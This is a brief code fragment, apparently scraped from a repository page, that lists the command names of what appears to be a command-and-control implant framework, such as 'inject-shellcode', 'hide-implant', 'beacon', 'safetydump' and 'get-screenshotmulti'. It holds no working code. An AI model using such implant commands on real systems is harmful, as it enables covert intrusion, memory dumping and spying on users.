"inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
|
2019-02-21 18:09:23 +00:00
|
|
|
"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump"]
|